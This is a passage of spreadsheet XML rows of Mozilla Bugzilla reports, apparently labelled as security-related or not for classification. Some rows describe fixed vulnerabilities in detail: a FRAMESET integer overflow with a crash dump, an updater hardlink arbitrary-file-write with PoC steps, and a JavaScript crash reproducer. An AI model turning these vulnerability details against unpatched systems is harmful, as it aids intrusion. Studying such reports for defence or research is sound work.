Once the video finishes. It becomes full screen again by itself. And the darn video will keep making itself fullscreen until you tap done or close the tab. 
On a site like reddit where you are scrolling multiple gifs this is super annoying.</t>
        </is>
      </c>
      <c r="X1652" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" t="n">
        <v>136513</v>
      </c>
      <c r="B1653" t="inlineStr">
        <is>
          <t>2002-04-09 19:05:59 -0700</t>
        </is>
      </c>
      <c r="C1653" t="inlineStr">
        <is>
          <t>Crash changing font size preference while nsEngineer panel showing</t>
        </is>
      </c>
      <c r="D1653" t="inlineStr">
        <is>
          <t>2008-07-31 03:07:46 -0700</t>
        </is>
      </c>
      <c r="E1653" t="n">
        <v>1</v>
      </c>
      <c r="F1653" t="n">
        <v>1</v>
      </c>
      <c r="G1653" t="n">
        <v>3</v>
      </c>
      <c r="H1653" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1653" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1653" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1653" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1653" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1653" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1653" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1653" t="inlineStr"/>
      <c r="Q1653" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1653" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1653" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T1653" t="n">
        <v>1</v>
      </c>
      <c r="U1653" t="n">
        <v>0</v>
      </c>
      <c r="V1653" t="n">
        <v>15</v>
      </c>
      <c r="W1653" t="inlineStr">
        <is>
          <t>Talkback incident id: 5005292
http://climate.netscape.com/reports/SingleIncidentInfo.cfm?dynamicBBID=5005292
(Netscape internal)
operator []()
nsCOMPtr_base::assign_from_helper()
nsCSSFrameConstructor::ConstructXULFrame()
nsCSSFrameConstructor::ConstructFrameInternal()
nsCSSFrameConstructor::ConstructFrame()
nsCSSFrameConstructor::CreateAnonymousFrames()
nsCSSFrameConstructor::CreateAnonymousFrames()
nsCSSFrameConstructor::ConstructDocElementFrame()
nsCSSFrameConstructor::ReconstructDocElementHierarchy()
StyleSetImpl::ReconstructDocElementHierarchy()
PresShell::ReconstructFrames()
PresShell::SetPreferenceStyleRules()
nsPresContext::PreferenceChanged()
nsPresContext::PrefChangedCallback()
pref_DoCallback()
pref_HashPref()
PREF_SetIntPref()
nsPrefBranch::SetIntPref()
nsPrefService::SetIntPref()
nsPref::SetIntPref()
XPTC_InvokeByIndex()
XPCWrappedNative::CallMethod()
XPC_WN_CallMethod()
js_Invoke()
js_Interpret()
js_Invoke()
js_InternalInvoke()
JS_CallFunctionValue()
nsJSContext::CallEventHandler()
GlobalWindowImpl::RunTimeout()
GlobalWindowImpl::TimerCallback()
nsTimerImpl::Process()
handleMyEvent()
PL_HandleEvent()
PL_ProcessPendingEvents()
nsEventQueueImpl::ProcessPendingEvents()
event_processor_callback()
our_gdk_io_invoke()
libglib-1.2.so.0 + 0xff9e (0x40392f9e)
libglib-1.2.so.0 + 0x11773 (0x40394773)
libglib-1.2.so.0 + 0x11d39 (0x40394d39)
libglib-1.2.so.0 + 0x11eec (0x40394eec)
libgtk-1.2.so.0 + 0x94333 (0x402b0333)
nsAppShell::Run()
nsAppShellService::Run()
netscape-bin + 0x8c79 (0x08050c79)
netscape-bin + 0x9457 (0x08051457)
libc.so.6 + 0x1c507 (0x404db507)</t>
        </is>
      </c>
      <c r="X1653" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1654">
      <c r="A1654" t="n">
        <v>642717</v>
      </c>
      <c r="B1654" t="inlineStr">
        <is>
          <t>2011-03-17 20:36:58 -0700</t>
        </is>
      </c>
      <c r="C1654" t="inlineStr">
        <is>
          <t>Refresh driver needs to hold strong refs to |targets| in Notify</t>
        </is>
      </c>
      <c r="D1654" t="inlineStr">
        <is>
          <t>2015-10-16 11:41:05 -0700</t>
        </is>
      </c>
      <c r="E1654" t="n">
        <v>1</v>
      </c>
      <c r="F1654" t="n">
        <v>1</v>
      </c>
      <c r="G1654" t="n">
        <v>3</v>
      </c>
      <c r="H1654" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1654" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1654" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1654" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1654" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1654" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1654" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1654" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1654" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1654" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1654" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T1654" t="n">
        <v>1</v>
      </c>
      <c r="U1654" t="n">
        <v>0</v>
      </c>
      <c r="V1654" t="n">
        <v>11</v>
      </c>
      <c r="W1654" t="inlineStr">
        <is>
          <t>I came across this while working on bug 607529 (and the patch for that bug includes a fix for this one, but that bug is not landing in fx4).
I believe that the current code in Notify is unsafe.  |targets| holds weak references, and since they're on the stack they can't be removed when the documents go away.  So if one of the events triggers script that ends up collecting some of the other documents, then we could end up doing event dispatch to a dead event target, which seems bad.
I'll attach a minimal fix here.  I don't think this is worth respinning for, but I do think we should take this ASAP once we start taking .x fixes.</t>
        </is>
      </c>
      <c r="X1654" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1655">
      <c r="A1655" t="n">
        <v>689909</v>
      </c>
      <c r="B1655" t="inlineStr">
        <is>
          <t>2011-09-28 05:37:49 -0700</t>
        </is>
      </c>
      <c r="C1655" t="inlineStr">
        <is>
          <t>no build status display for l10n repacks</t>
        </is>
      </c>
      <c r="D1655" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1655" t="n">
        <v>1</v>
      </c>
      <c r="F1655" t="n">
        <v>1</v>
      </c>
      <c r="G1655" t="n">
        <v>5</v>
      </c>
      <c r="H1655" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1655" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1655" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1655" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1655" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1655" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1655" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1655" t="inlineStr"/>
      <c r="Q1655" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1655" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1655" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1655" t="n">
        <v>1</v>
      </c>
      <c r="U1655" t="n">
        <v>0</v>
      </c>
      <c r="V1655" t="n">
        <v>12</v>
      </c>
      <c r="W1655" t="inlineStr">
        <is>
          <t>Seems that switching off tinderbox impacted l10n, the tinderbox pages are empty now, and I haven't seen any replacement come up yet.</t>
        </is>
      </c>
      <c r="X1655" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1656">
      <c r="A1656" t="n">
        <v>1331970</v>
      </c>
      <c r="B1656" t="inlineStr">
        <is>
          <t>2017-01-18 07:54:10 -0800</t>
        </is>
      </c>
      <c r="C1656" t="inlineStr">
        <is>
          <t>Crash in MenuPresentationAnimator</t>
        </is>
      </c>
      <c r="D1656" t="inlineStr">
        <is>
          <t>2017-03-01 11:09:44 -0800</t>
        </is>
      </c>
      <c r="E1656" t="n">
        <v>1</v>
      </c>
      <c r="F1656" t="n">
        <v>1</v>
      </c>
      <c r="G1656" t="n">
        <v>2</v>
      </c>
      <c r="H1656" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1656" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1656" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1656" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1656" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1656" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1656" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1656" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q1656" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1656" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1656" t="n">
        <v>1</v>
      </c>
      <c r="U1656" t="n">
        <v>0</v>
      </c>
      <c r="V1656" t="n">
        <v>7</v>
      </c>
      <c r="W1656" t="inlineStr">
        <is>
          <t>Created attachment 8827955
2017-01-17_20-17-21.2447_-0800-05315de1146884b3810d0eb8d3b715a86355060b.crash
Currently #1 crash in Firefox 6.0 according to the Organizer.</t>
        </is>
      </c>
      <c r="X1656" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1657">
      <c r="A1657" t="n">
        <v>1446365</v>
      </c>
      <c r="B1657" t="inlineStr">
        <is>
          <t>2018-03-16 06:20:25 -0700</t>
        </is>
      </c>
      <c r="C1657" t="inlineStr">
        <is>
          <t>Out of bounds write in libtremor</t>
        </is>
      </c>
      <c r="D1657" t="inlineStr">
        <is>
          <t>2018-11-05 14:19:15 -0800</t>
        </is>
      </c>
      <c r="E1657" t="n">
        <v>1</v>
      </c>
      <c r="F1657" t="n">
        <v>1</v>
      </c>
      <c r="G1657" t="n">
        <v>3</v>
      </c>
      <c r="H1657" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1657" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1657" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1657" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1657" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1657" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1657" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1657" t="inlineStr">
        <is>
          <t>[Pwn2Own 2018]</t>
        </is>
      </c>
      <c r="Q1657" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1657" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1657" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T1657" t="n">
        <v>1</v>
      </c>
      <c r="U1657" t="n">
        <v>0</v>
      </c>
      <c r="V1657" t="n">
        <v>2</v>
      </c>
      <c r="W1657" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1446062 +++
Huzaifa Sidhpurwala reported that libtremors has the same problem as the original bug 1446062 in libvorbis (See bug 1446062 comment 26). This was patched as a continuation of that bug. CVE rules seem to require a separate CVE for the separate implementation (products could have one and not be affected by the other) so I'm creating this as a placeholder.
The patch is attachment 8959436</t>
        </is>
      </c>
      <c r="X1657" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1658">
      <c r="A1658" t="n">
        <v>576447</v>
      </c>
      <c r="B1658" t="inlineStr">
        <is>
          <t>2010-07-01 22:00:17 -0700</t>
        </is>
      </c>
      <c r="C1658" t="inlineStr">
        <is>
          <t>FRAMESET integer overflow via new operator in nsHTMLFrameSetElement::ParseRowCol()</t>
        </is>
      </c>
      <c r="D1658" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1658" t="n">
        <v>1</v>
      </c>
      <c r="F1658" t="n">
        <v>1</v>
      </c>
      <c r="G1658" t="n">
        <v>3</v>
      </c>
      <c r="H1658" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1658" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1658" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1658" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1658" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1658" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1658" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1658" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q1658" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1658" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1658" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1658" t="n">
        <v>1</v>
      </c>
      <c r="U1658" t="n">
        <v>0</v>
      </c>
      <c r="V1658" t="n">
        <v>31</v>
      </c>
      <c r="W1658" t="inlineStr">
        <is>
          <t>Created attachment 455624
PoC
Chris@Matasano.com reported the following integer overflow vulnerability to security@:
==============================================================================
FRAMESET integer overflow in new operator on line 332 of nsHTMLFrameSetElement.cpp
A FRAMESET tag looks like this:
  &lt; FRAMESET cols="%20,%80" &gt;
When a call to setAttribute occurs on the FRAMESET element we reach the following function on line 332 of nsHTMLFrameSetElement.cpp:
nsresult
nsHTMLFrameSetElement::ParseRowCol(const nsAString &amp; aValue,
                                   PRInt32&amp; aNumSpecs,
                                   nsFramesetSpec** aSpecs)
{
...
  // Count the commas 
  PRInt32 commaX = spec.FindChar(sComma);
  PRInt32 count = 1;
  while (commaX != kNotFound) {
    count++;
    commaX = spec.FindChar(sComma, commaX + 1);
  }
  nsFramesetSpec* specs = new nsFramesetSpec[count];
...
nsHTMLFrameSetElement::ParseRowCol counts the number of commas in the tag and then allocates a heap buffer using that number with the new operator. The size of the nsFramesetSpec structure is 8 bytes, so we need 536870912 or more commas to trigger the integer overflow. When this happens, too small of an allocation occurs and the proceeding heap memory is overwritten in the for loop on line 347.
Here is the crash dump from WinDBG:
0:000&gt; r
eax=ffffffff ebx=00000000 ecx=00000000 edx=0000002c esi=001f0004 edi=00000000
eip=5e560c97 esp=001ee984 ebp=001eea78 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
xul!nsHTMLFrameSetElement::ParseRowCol+0xaf:
5e560c97 8366fc00        and     dword ptr [esi-4],0  ds:0023:001f0000=00905a4d
There is one mitigating factor, as you will see when you push the button below. The script requires such an enormous allocation of commas that FF will ask the user several times if the script should be allowed to continue or not. Exploiting this bug in a 32bit Firefox process might be difficult as the commas take up most of the available heap memory. But a 64bit process is a different story.
Fixing this vulnerability is relatively straight forward. Define a max number of commas and check count within the while loop to see if it has reached that threshold. If it has, exit the while loop. Alternatively checking for integer overflow before the new operator is called is also suggested.</t>
        </is>
      </c>
      <c r="X1658" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1659">
      <c r="A1659" t="n">
        <v>61031</v>
      </c>
      <c r="B1659" t="inlineStr">
        <is>
          <t>2000-11-22 16:07:10 -0800</t>
        </is>
      </c>
      <c r="C1659" t="inlineStr">
        <is>
          <t>Mozilla not start on Macs with CE (Central European) script!</t>
        </is>
      </c>
      <c r="D1659" t="inlineStr">
        <is>
          <t>2001-01-26 01:20:07 -0800</t>
        </is>
      </c>
      <c r="E1659" t="n">
        <v>1</v>
      </c>
      <c r="F1659" t="n">
        <v>1</v>
      </c>
      <c r="G1659" t="n">
        <v>3</v>
      </c>
      <c r="H1659" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1659" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1659" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K1659" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1659" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M1659" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N1659" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1659" t="inlineStr">
        <is>
          <t>relnote-user</t>
        </is>
      </c>
      <c r="Q1659" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1659" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1659" t="inlineStr">
        <is>
          <t>mozilla0.8</t>
        </is>
      </c>
      <c r="T1659" t="n">
        <v>1</v>
      </c>
      <c r="U1659" t="n">
        <v>4</v>
      </c>
      <c r="V1659" t="n">
        <v>52</v>
      </c>
      <c r="W1659" t="inlineStr">
        <is>
          <t>Major problem!
Mozilla M18 and Netscape 6 contain a bug that prevents them from
launching under Mac OS 8.6 and Mac OS 9 (inclusive 9.0.4) if the CE
(Central European) language script is active !!! The same problem is
with the native (localized) version of Mac OS CZ1-8.6 and MacOS
CZ1-9.0.4
Mozilla starts to boot -- if this is the first boot on the machine,
the component registration will be executed - and after the
registration, the application quits itself gracefully without any
error message or dialog (even in the case of MacsBug being
installed). In the case of a repetitive boot the app quits after
aproximatelly 1-2 seconds...
If the CE script is of, you can launch Mozilla/Netscape 6 safely...
If the CE script is then activated, Mozilla/Netscape 6 goes into
debugger during launch (we are sending the StdLog to news)!
This bug started appearing in M18 (Netscape PR3) -- M17 works well on
the same machine! This bug was tested and reproduced on several
machines including G3, G4, iMac, PowerMac 9500 -- always compleely
identical crash.
Reference machine:
iMac DV SE 400 MHz
256 MB RAM
13 GB HDD
Mac OS 9.0.4 US (active CE script)
or Mac OS CZ1-9.0.4
QuickTime 4.1.2
M18 -- several nightly builds tested --&gt; cannot launch
Netscape 6 -- official release --&gt; cannot launch
Please, do fix this problem prioritely! It prevents us using Mozilla
on any computer in Czech or Slovak Republic, Poland or Hungary. Our
localization process is also halted as we cannot check our work.
 PowerPC 740/750 Registers
                         CR0  CR1  CR2  CR3  CR4  CR5  CR6  CR7
  PC  = 40820008     CR  0010 0010 0000 0000 0000 0000 0100 1000
  LR  = 1E897DD0         &lt;&gt;=O XEVO
  CTR = 40820008
  MSR = 00000000         SOC Compare Count
  Int = 0            XER 000   00     00                     MQ  = 00000000
  R0  = 40820008     R8  = 0E244BA8      R16 = 00000000      R24 = 0E243F00
  SP  = 0F22B760     R9  = 00000001      R17 = 00000000      R25 = 00000000
  TOC = 38A00000     R10 = 00000001      R18 = 00000000      R26 = 0F22CB38
  R3  = 00000000     R11 = 00000001      R19 = 0E3337C8      R27 = 00000000
  R4  = 0F22B850     R12 = 00141568      R20 = 0E46D8F8      R28 = 00000000
  R5  = 0E3B1110     R13 = 00000000      R21 = 0F22CB38      R29 = 0F22B850
  R6  = 00029B68     R14 = 00000000      R22 = 0F22CB44      R30 = 0F22C3A4
  R7  = 00000066     R15 = 00000000      R23 = 1E75E6B9      R31 = 0E243F00
 Unable to access that address
 Heap zones
  #1  Mod       17457K  00002800 to 0110EF0F  SysZone^
  #2  Mod           6K    00026DB0 to 0002896F  ROM read-only zone
  #3  Mod      234392K  0110EF10 to 0F5F529F  Process Manager zone
  #4  Mod       16197K    0E210340 to 0F1E1A3F  “Mozilla”  ApplZone^  TheZone^  
TargetZone
  #5  Mod          18K    0F2E75D0 to 0F2EBE7F
  #6  Mod         954K    0F301BA0 to 0F3F069F  “Finder”
  #7  Mod          99K    0F405000 to 0F41DEFF  “Time Synchronizer”
  #8  Mod         265K    0F428860 to 0F46AF5F  “iDo Script Scheduler Extension”
  #9  Mod         361K    0F47F8C0 to 0F4D9FBF  “Folder Actions”
  #10 Mod          78K    0F50E180 to 0F521BAF  “DVD AutoLauncher”
  #11 Mod         153K    0F531DE0 to 0F5584DF  “Control Strip Extension”
  #12 Mod         169K    0F56AE40 to 0F59553F  “Connectix Network Copy”
  #13 Mod        4095K  10100000 to 104FFFCF
  #14 Mod         144K    102413D0 to 102653CF
  #15 Mod          94K    102C74A0 to 102DF07F</t>
        </is>
      </c>
      <c r="X1659" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1660">
      <c r="A1660" t="n">
        <v>1246945</v>
      </c>
      <c r="B1660" t="inlineStr">
        <is>
          <t>2016-02-09 07:00:58 -0800</t>
        </is>
      </c>
      <c r="C1660" t="inlineStr">
        <is>
          <t>Write to arbitrary file with updater and moz maintenance service using updater.log hardlink</t>
        </is>
      </c>
      <c r="D1660" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:16 -0700</t>
        </is>
      </c>
      <c r="E1660" t="n">
        <v>1</v>
      </c>
      <c r="F1660" t="n">
        <v>1</v>
      </c>
      <c r="G1660" t="n">
        <v>3</v>
      </c>
      <c r="H1660" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1660" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1660" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1660" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1660" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1660" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1660" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1660" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+] fixed by bug 1168743</t>
        </is>
      </c>
      <c r="Q1660" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1660" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1660" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1660" t="n">
        <v>1</v>
      </c>
      <c r="U1660" t="n">
        <v>0</v>
      </c>
      <c r="V1660" t="n">
        <v>44</v>
      </c>
      <c r="W1660" t="inlineStr">
        <is>
          <t>Created attachment 8717458
write.poc.zip
During an update a updater.log file is created in the update source directory. If possible the new log data are added to an existing log file. If the file is actually a hardlink the new data are added to an arbitrary file. 
The poc use the CreateHardlink tool from https://github.com/google/symboliclink-testing-tools to create the hardlink without the need of write access to the target file. 
I have tested the poc with win7 and ff 47 nightly installed to C:\Program Files (x86)\Nightly\:
To reproduce
- download poc and extract the files
- execute poc.rb
The poc adds amongst other data a user controlled new line to the updater.ini in the firefox directory.
This might be used to elevate privileges by overwriting a script or ini file which has a permissive parser which subsequently gets executed/parsed by a privileged process.</t>
        </is>
      </c>
      <c r="X1660" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1661">
      <c r="A1661" t="n">
        <v>722697</v>
      </c>
      <c r="B1661" t="inlineStr">
        <is>
          <t>2012-01-31 07:19:51 -0800</t>
        </is>
      </c>
      <c r="C1661" t="inlineStr">
        <is>
          <t>Show contributor sidebar in the questions app</t>
        </is>
      </c>
      <c r="D1661" t="inlineStr">
        <is>
          <t>2012-02-29 16:25:25 -0800</t>
        </is>
      </c>
      <c r="E1661" t="n">
        <v>1</v>
      </c>
      <c r="F1661" t="n">
        <v>1</v>
      </c>
      <c r="G1661" t="n">
        <v>5</v>
      </c>
      <c r="H1661" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1661" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1661" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1661" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1661" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1661" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1661" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1661" t="inlineStr">
        <is>
          <t>u=contributor c=questions s=2012.4 p=1</t>
        </is>
      </c>
      <c r="Q1661" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1661" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1661" t="inlineStr">
        <is>
          <t>2012-03-06</t>
        </is>
      </c>
      <c r="T1661" t="n">
        <v>1</v>
      </c>
      <c r="U1661" t="n">
        <v>0</v>
      </c>
      <c r="V1661" t="n">
        <v>9</v>
      </c>
      <c r="W1661" t="inlineStr">
        <is>
          <t>Please add the sidebar to /questions and show it below the other information in the sidebar</t>
        </is>
      </c>
      <c r="X1661" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1662">
      <c r="A1662" t="n">
        <v>733979</v>
      </c>
      <c r="B1662" t="inlineStr">
        <is>
          <t>2012-03-07 17:38:56 -0800</t>
        </is>
      </c>
      <c r="C1662" t="inlineStr">
        <is>
          <t>Opt-only Crash [@ js::gc::MarkInternal]</t>
        </is>
      </c>
      <c r="D1662" t="inlineStr">
        <is>
          <t>2013-03-11 07:29:59 -0700</t>
        </is>
      </c>
      <c r="E1662" t="n">
        <v>1</v>
      </c>
      <c r="F1662" t="n">
        <v>1</v>
      </c>
      <c r="G1662" t="n">
        <v>3</v>
      </c>
      <c r="H1662" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1662" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1662" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1662" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1662" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1662" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1662" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1662" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q1662" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1662" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1662" t="inlineStr">
        <is>
          <t>mozilla12</t>
        </is>
      </c>
      <c r="T1662" t="n">
        <v>1</v>
      </c>
      <c r="U1662" t="n">
        <v>0</v>
      </c>
      <c r="V1662" t="n">
        <v>17</v>
      </c>
      <c r="W1662" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision 7d0d1108a14e (options -m -n -a, 32 bit optimized only):
function inSection(x) {}
function printStatus (msg) {}
function reportCompare (expected, actual, description) {
  var expected_t = typeof expected;
  var actual_t = typeof actual;
    printStatus ("Expected type '" + expected_t + "' matched actual " + "type '" + actual_t + "'");
}
new Function("\
var actual = '';\
var expect = '';\
var date1;\
var date2;\
var validDateStrings = [ '11/69/2004', ];\
var invalidDateStrings = [ '70/70/70', '70/70/1970', '70/70/2004'];\
for (i = 0; i &lt; validDateStrings.length; i++) {\
  date1 = new Date(validDateStrings[i]);\
  date2 = new Date(date1.toDateString());\
  actual = date2 - date1;\
}\
var offset = validDateStrings.length;\
for (i = 0; i &lt; invalidDateStrings.length; i++) {\
  date1 = new Date(invalidDateStrings[i]);\
  i  = isNaN(date1);\
  reportCompare(expect, actual, inSection(i + offset) + ' ' + invalidDateStrings[i] + (3));\
}\
")();
Crash trace:
==53139== Invalid read of size 4
==53139==    at 0x80ABD1A: void js::gc::MarkInternal&lt;JSString&gt;(JSTracer*, JSString*) (jsgcmark.cpp:105)
==53139==    by 0x80AAEDF: js::gc::MarkValueRootRange(JSTracer*, unsigned int, JS::Value*, char const*) (jsgcmark.cpp:321)
